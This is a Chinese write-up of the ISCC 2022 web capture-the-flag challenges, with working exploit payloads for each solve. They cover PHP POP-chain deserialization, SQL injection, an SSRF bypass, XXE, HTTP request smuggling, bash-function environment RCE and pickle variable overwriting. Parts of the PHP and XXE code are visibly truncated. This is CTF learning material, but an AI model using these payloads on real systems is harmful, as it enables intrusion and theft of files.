2022ISCC-web-wp

2022ISCC-web

除了0解的爱国敬业好青年1，其他都写出来了，wp写的有点简单，有问题欢迎提问

冬奥会

传入一个json字符串，第一个键为year，且值不为数字

if(is_array(@$info["items"])){
    if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
    $status = array_search("skiing", $info["items"]);
    $status===false?die("Sorry~"):NULL;
    foreach($info["items"] as $key=>$val){
      $val==="skiing"?die("Sorry~"):NULL;
    }
    $Step2=True;
  }

第二个键为items，利用函数接入到了不符合的类型返回“0”，使用二维数组进行绕过

poc

?Information={"year":"a","items":[0,[],"a"]}

爱国敬业好青年2

5.10为共青团成立100周年，猜测坐标为天安门，进入/flag页面，post提交经纬度即可得到flag

post提交

lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N

Pop2022

目标为include。可以使用php伪协议来读取并输出文件。

poc:

page = $file;
    }
    public function __toString(){
        echo '__toString';
        return $this->string->page;
    }
 
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=/flag.php';
    public function append($value){
        echo 'append';
        include($value);
    }
    public function __invoke(){
        echo '__invoke';
        $this->append($this->var);
    }
} 
class Make_a_Change{
    public $effort;
    public function __construct(){
        //echo 'Make_a_Change__construct';
        $this->effort = array();
    }
 
    public function __get($key){
        echo '__get';
        $function = $this->effort;
        return $function();
    }
}
 
$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard(); 
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a)); 
?>

ISCC{lets_pop_your_2022}

Easy-SQL

?id=-8 union table emails limit 7,1#

获得源码

在联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据

username=0’ union select 1,0x61646d696e,3#&passwd=3

findme

简单的php原生类利用

http://59.110.159.206:8030/unser.php

先使用伪协议获取hint.php，得知flag大概位置

poc直接打获得flag文件

让我康康！

一个搜索框，提示我们访问fl4g页面，访问后返回403页面，我们尝试一下使用HTTP请求走私漏洞访问fl4g页面，提示需要来自本地

配合搜索框，发现由前端重写的请求包会被反馈在响应中，需要post提交数据，添加CT字段，成功通过HTTP请求走私漏洞获取到了前端服务器用来指定来源IP的字段名，我们就可以伪造成本地用户了

最终获得flag

这是一道代码审计题

访问index构造请求url=1,获得报错页面，查看源码

访问此文件，发现emoji编码的源码，

进行解码，获得源代码

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"

def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"

def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]

def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24

def waf1(ip):
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False

def judge_ip(ip):
    if(waf1(ip)):
        return Fasle
    else:
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodestring(addr)
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return False

构造请求http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x

绕过ssrf限制，获得新提示

访问此目录，并抓包更改cookie为题目所给

登录到登录框界面，右键查看源代码，得到一串js源码

很明显要我们构造post数据包，存在xxe漏洞，构造如下

POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172



  ]>
&name;admin

成功读取文件

根据提示利用proc特性，proc/self/cwd/获取目标当前进程环境的运行目录与目录里的文件

读取proc/self/cwd/flag.txt文件得到flag

ping2rce

环境变量rce，可参考p牛的文章https://tttang.com/archive/1450/，直接构造poc即可命令执行

POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379

--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"

() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--

Melody

先随便登录一个用户，可以看到存在session认证

eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI

发现提示/info页面需要使用Melody浏览器登录，更改UA头为Melody即可

发现junjia2模板注入，查看配置信息，发现session_key，那我们接下来直接伪造session即可

获得key：meldoy-is-so-cute-wawawa!

然后使用脚本进行flask session伪造，替换session后登录成功

虚假的flag，发现一个py源文件，访问下载

代码如下

# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request

class register:
    def __init__(self,name,password):
        self.name = name
        self.password = password

    def __eq__(self, other):
        return type(other) is register and self.name == other.name and self.password == other.password


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module[0:8] == '__main__':
            return getattr(sys.modules['__main__'],name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def find(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/therealflag', methods=['GET','POST'])
def realflag():
    if request.method == 'POST':
        try:
            data = request.form.get('melody')
            if b'R' in base64.b64decode(data):
                return 'no reduce'
            else:
                result = find(base64.b64decode(data))
                if type(result) is not register:
                    return 'The type is not correct!'
            correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
            if correct:
                if session['username'] == 'admin':
                    return Response(read('./flag.txt'))
                else:
                    return Response("You're not admin!")
        except Exception as e:
            return Response(str(e))

    test = register('admin', '123456')
    data = base64.b64encode(pickle.dumps(test)).decode()
    return Response(data)

pickle反序列化，写脚本，pker进行原变量覆盖

import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))